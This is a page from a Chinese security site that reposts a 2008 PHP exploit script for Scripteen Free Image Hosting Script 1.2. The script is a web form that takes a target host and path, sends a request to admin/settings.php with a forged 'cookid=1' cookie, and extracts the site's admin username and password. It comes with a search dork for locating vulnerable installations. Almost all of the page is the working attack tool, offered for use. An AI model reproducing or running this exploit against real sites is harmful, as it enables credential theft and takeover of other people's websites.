首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit
来源:BiyoSecurity.Com 作者:RMx 发布时间:2008-07-14  
<?php
/*
Coded By RMx - Liz0zim
BiyoSecurity.Com & Coderx.org
Ki zava Ki Zava :)
Thanx : Crackers_Child - TR_IP - Volqan - All SQL Low3rz
*/
error_reporting("E_ALL");
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
$desen='|value="(.*)"|siU';

function yolla($host,$paket)
{
global $veri;
$ac=fsockopen(gethostbyname($host),80);
if (!$ac) {
echo 'Unable to connect to server '.$host.':80'; exit;//Bağlanamaz ise
}
fputs($ac,$paket);
$veri="";
    while (!feof($ac)) {
      $veri.=fread($ac,1);

  }
  fclose($ac);
}
?>
<h2>Scripteen Free Image Hosting Script V1.2.* (cookie) Admin Password Grabber Exploit</h2>
<p>Coded By RMx - Liz0ziM</p>
<p>Web:<a href="http://www.biyosecurity.com" target="_blank">www.biyosecurity.com</a> </p>
<p>Dork:"Powered by Scripteen Free Image Hosting Script V1.2"</p>
<form method="POST" action="">
<p>TARGET HOST:
  <input name="host" type="text" />
  Example:<strong>www.xxxx.com</strong></p>
<p>TARGET PATH:   <input name="klasor" type="text" />
Example:<strong>/</strong> or <strong>/scriptpath/</strong> </p>
<p><input name="yolla" type="submit" value="Send" /></p>
</form><br />
<? if($_POST[yolla]){
$host=$_POST[host];
$klasor=$_POST[klasor];
$admin=$_POST[admin];
$p=$klasor."admin/settings.php";
echo '<font color="red"><b>Sending Exploit..</b></font><br>';
$packet ="GET ".$p." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cookid=1\r\n";
$packet.="Connection: Close\r\n\r\n";
yolla($host,$packet);
preg_match_all($desen,$veri,$cik);
$ad=$cik[1][0];
$sifre=$cik[1][1];
if($ad AND $sifre){
echo '
<font color="green">Exploit succeeded...</font ><br>
Admin Username:<b>'.$ad.'</b><br>
Admin Password:<b>'.$sifre.'</b><br>';
}
else
{
echo '<font color="red">Exploit Failed !</font>';
}
}

?>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ultrastats <= 0.2.142 (players
·fuzzylime cms 3.01 (commrss.ph
·Yahoo Messenger 8.1 ActiveX Re
·Simple DNS Plus <= 5.0/4.1 Rem
·Galatolo Web Manager 1.3a <= X
·AuraCMS <= 2.2.2 (pages_data.p
·WinRemotePC Full+Lite 2008 r.2
·Poppler <= 0.8.4 libpoppler un
·Document Imaging SDK 10.95 Act
·OllyDBG v1.10 and ImpREC v1.7f
·PHPizabi 0.848b C1 HFP1 Remote
·Download Accelerator Plus - DA
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved